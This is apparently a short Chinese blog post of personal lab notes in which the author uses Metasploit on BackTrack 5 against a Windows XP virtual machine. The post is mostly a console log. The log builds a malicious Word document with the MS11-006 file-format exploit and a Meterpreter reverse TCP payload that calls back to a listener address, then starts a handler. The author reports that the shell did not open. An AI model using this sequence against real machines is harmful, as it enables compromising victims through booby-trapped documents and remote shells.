因为BT5R3失败了,所以现在换成了BT5R1。
msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf exploit(ms11_006_createsizeddibsection) > show options
Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
OUTPUTPATH /opt/framework/msf3/data/exploits/ yes The output path to use.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process, none
LHOST 192.168.1.11 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) > 生成了msf.doc,把这个文件复制到XP虚拟机里。
然后,在BT5里输入命令:
msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
msf exploit(handler) > 我打开msf.doc,但是BT5没有成功打开shell。可能不是英文的缘故吧。明天换个英文的XP试试。
扫一扫
844
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
